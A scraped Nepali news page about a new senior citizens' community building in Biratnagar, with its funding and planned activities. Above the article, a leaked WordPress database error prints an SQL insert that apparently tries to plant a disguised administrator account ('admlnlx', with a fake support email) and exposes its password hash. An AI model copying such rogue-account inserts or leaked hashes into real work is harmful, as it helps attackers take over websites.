WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQlD2WJbUo4V4G9fHta51JmA5Fe1Wq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 10:06:16', '', 'admlnlx', 'admlnlx')

ज्येष्ठ नागरिक सामुदायिक भवन निर्माण – Gaule Khabar

ज्येष्ठ नागरिक सामुदायिक भवन निर्माण

ज्येष्ठ नागरिक सामुदायिक भवन निर्माण

काठमाण्डौ । ज्येष्ठ नागरिकको बाँकी जीवन सहज बिताउन विराटनगर महानगरपालिका–११ मा ज्येष्ठ नागरिक सामुदायिक भवन बनाएको छ ।

भवन एवं जग्गा खरिदका लागि प्रदेश नं १ सरकारको रु पाँच लाख, विराटनगर महानगरपालिकाको रु ४० लाख र चिरञ्जीवी दाहालबाट निःशुल्क प्राप्त आठ धुर जग्गा र स्वदेश तथा विदेशका विभिन्न दाताबाट रु ९० लाख सहयोग प्राप्त भएको छ ।

सामुदायिक भवनको लागि १६ धुरजग्गा रु ६३ लाखमा खरिद गरी रु ७० लाखमा दुई हजार आठ सय वर्ग फिटमा एक सभा हलसहित भवन बनाएको छ । सामुदायिक भवनमा ज्येष्ठ नागरिकलाई विज्ञद्वारा मनोरञ्जन, विभिन्न विषयमा ज्ञान प्रदान, भवनकीर्तन, आधुनिक प्रविधिको विषयमा जानकारी दिनुका साथै बिहान योग कक्षा सञ्चालन गरिने छ ।

विराटनगर महानगरपालिकाका प्रमुख नागेश कोइरालाले भवनको शुक्रबार उद्घाटन गर्दै ज्येष्ठ नागरिक जिउँदो इतिहास र राष्ट्रका गहना भएकाले उनीहरुबाट प्राप्त अनुभव समाज र राष्ट्रको विकासमा लगाउनुपर्नेमा जोड दिनुभयो । भवन निर्माण र जग्गा खरिदका लागि तीन सय दाताले रु तीन लाख एक सय ११ देखि तीन सय ५८ सम्म सहयोग गरेको थियो । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका